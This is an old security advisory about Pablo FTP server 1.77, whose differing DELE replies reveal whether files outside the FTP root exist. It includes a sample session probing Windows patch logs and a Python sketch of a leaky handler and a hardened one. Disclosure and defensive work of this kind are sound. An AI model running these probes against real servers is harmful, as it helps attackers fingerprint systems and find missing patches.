pablo-ftp.txt

Posted Jan 19, 2004
Authored by Arnaud Jacques | Site securiteinfo.co

Pablo FTP server version 1.77 allows for information disclosure by detecting whether or not a file exists outside of the FTP root directory, allowing a remote attacker to peruse the system at will.

tags | advisory, remote, root, info disclosure
SHA-256 | 30472f2da0279acae8a308c9b219bd017b1c9a745f39a30ef1595f0e3ec6872e

Pablo Software Solutions FTP server lets a client detect if a file exists
outside the FTP root directory


.oO Overview Oo.

Pablo Software Solutions FTP server version 1.77 lets a logged-in client
detect if a file exists outside the FTP root directory.
Discovered on January 11th, 2004
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It
comes with an easy to use interface and can be accessed from the system tray.
The server handles all basic FTP commands and offers easy user account
management and support for virtual directories. This FTP server lets a
logged-in client detect if a file exists outside the FTP root directory.


.oO Details Oo.

The issue can be reproduced with the MS-DOS ftp client. Once you are logged
on to the server, you can send a del \..\<filename>, supposing your root
directory is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If
<filename> doesn't exist, the FTP server answers "550 File not found."
In either case, the file is never deleted, which is the expected behaviour.
The difference between the two replies is what discloses whether the file
exists.


.oO Exploit Oo.

Checking if a file exists on a remote system can be useful to:

* Fingerprint the OS. Different OSes don't install the same files by default.
This way, you can know if the remote system is Windows NT, or 2000 or
XP...
* Know the vulnerabilities of a system. By testing if
"../WINNT/Q329115.log" exists, you can know if the remote system has this
patch installed
* Maybe some other interesting things...

Here is an example of the vulnerability:

C:\>ftp 127.0.0.1
Connecté à 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit


.oO Solution Oo.

The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at
http://www.pablovandermeer.nl/ftp_server.html
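
The advisory does not describe how version 1.8 fixes the problem. As an added example (not the vendor's code), the Python sketch below contrasts a handler that checks existence before containment, which reproduces the two replies shown above, with one that rejects any path leaving the root before existence is tested. Function names, the directory layout and the 250 reply text are assumptions made for the illustration, and the session's working directory is assumed to be the FTP root.

```python
import os
import tempfile

DENIED = "550 Permission denied."
NOT_FOUND = "550 File not found."
DELETED = "250 DELE command successful."  # constructed reply text

def resolve_in_root(root, arg):
    """Map a client path to a real path, or None if it leaves the FTP root."""
    # Treat '\' like '/' so "\..\name" and "../name" are handled the same way.
    rel = arg.replace("\\", "/").lstrip("/")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, rel))
    # commonpath avoids the prefix bug where /srv/ftp2 "starts with" /srv/ftp.
    if os.path.commonpath([root_real, target]) != root_real:
        return None
    return target

def dele_leaky(root, arg):
    """Hypothetical reconstruction of the reported behaviour (out-of-root case only)."""
    rel = arg.replace("\\", "/").lstrip("/")
    target = os.path.normpath(os.path.join(root, rel))
    if not os.path.exists(target):
        return NOT_FOUND   # reply depends on the file's existence
    return DENIED

def dele_hardened(root, arg):
    """Containment is decided before existence is tested."""
    target = resolve_in_root(root, arg)
    if target is None:
        return DENIED      # same reply whether or not the file exists
    if not os.path.isfile(target):
        return NOT_FOUND
    os.remove(target)
    return DELETED

def demo():
    """Constructed layout: <tmp>/ftp_server is the root, <tmp>/WINNT is outside it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "ftp_server")
        os.makedirs(root)
        os.makedirs(os.path.join(tmp, "WINNT"))
        open(os.path.join(tmp, "WINNT", "Q328310.log"), "w").close()
        open(os.path.join(root, "inside.txt"), "w").close()
        probes = ["../WINNT/Q328310.log", "\\..\\WINNT\\Q329115.log"]
        return {"leaky": [dele_leaky(root, p) for p in probes],
                "hardened": [dele_hardened(root, p) for p in probes],
                "inside": dele_hardened(root, "inside.txt")}
```
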


.oO Discovered by Oo.

Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com